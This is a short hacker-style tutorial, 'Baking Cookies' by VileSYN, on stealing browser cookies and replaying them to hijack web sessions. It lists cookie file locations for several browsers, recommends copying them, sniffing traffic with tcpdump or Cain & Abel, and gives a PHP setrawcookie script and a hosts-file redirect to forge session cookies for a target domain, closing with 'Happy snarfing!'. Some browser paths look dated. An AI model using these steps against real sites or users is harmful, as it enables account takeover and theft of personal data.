Baking Cookies

by VileSYN

It's 10 pm.  Do you know where your cookies are?

I'm going to go over a few ways that cookies can be exploited, and why it's not a good idea to keep them in your browser.

Internet Explorer keeps the cookies in:

\Documents and Settings\%User%\Local Settings\Temporary Internet Files

With the file name starting with: Cookie:

Mozilla, on the other hand, saves the cookies.txt file in:

~/.mozilla/default/<random>.slt

Firefox stores it in:

~/.mozilla/firefox/default.s2e

Safari keeps its Cookies.plist file in:

~/Library/Cookies

Now that we know where they are, the question is what to do with them.

Any of the cookie files can be copied and used with the same type of browser on a different machine.  With the snarfed cookies, you can log into the domains that hold cookies and see what data is encapsulated inside.

Other ways to capture cookies include using Cain & Abel from oxid.it on Windows systems.

Another is to sniff packets.  Using tcpdump or any other sniffing utility, monitoring the HTTP port it's going through and using an unlimited snaplen (snapshot length, -s0) can show some interesting results.

What you are looking for is this:

Set-Cookie: <cookie-name>=<cookie-value> Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value> Set-Cookie: <cookie-name>=<cookie-value>; Expires=<date> Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly Set-Cookie: <cookie-name>=<cookie-value>; Max-Age=<number> Set-Cookie: <cookie-name>=<cookie-value>; Partitioned Set-Cookie: <cookie-name>=<cookie-value>; Path=<path-value> Set-Cookie: <cookie-name>=<cookie-value>; Secure

You can then take that information and forge your own cookies with a PHP file like this:

<?php $cookievalue1 = "1"; $cookievalue2 = "8"; $cookievalue3 = "25"; setrawcookie("password", $cookievalue1, time() + 3600, "/", ".fake.com", 0); setrawcookie("lastvisit", $cookievalue2, time() + 3600, "/", ".fake.com", 0); setrawcookie("userid", $cookievalue3, time() + 3600, "/", ".fake.com", 0); ?>

Here you set three cookies, password, lastvisit, and userid.

Each cookie is assigned a value, an expiration date (one hour), a path, a domain, and a boolean secure integer.

There is one trick to this though.  If you try this code as it is, it will not set the cookies.

If the browser does not see that the server resolves to the domain, it fails.  Of course, there are ways around this.

You simply edit your hosts file, and add a line like this:

127.0.0.1 fake.com

When you navigate to http://fake.com/cookie.php, you will resolve to yourself, and the cookies will set themselves.

With the . in front of the domain, all hosts are effected by this cookie.

You can then navigate to the original web server (i.e., www.fake.com) and it will recognize the cookie as being there.

If the values came from a legitimate source, then the server will see the cookies as being just as legitimate as long as the expiration has not been reached.

So that's it.  Happy snarfing!

Thanx to FBSDHN, SE, and Dale "The Sandgoggle" Texas.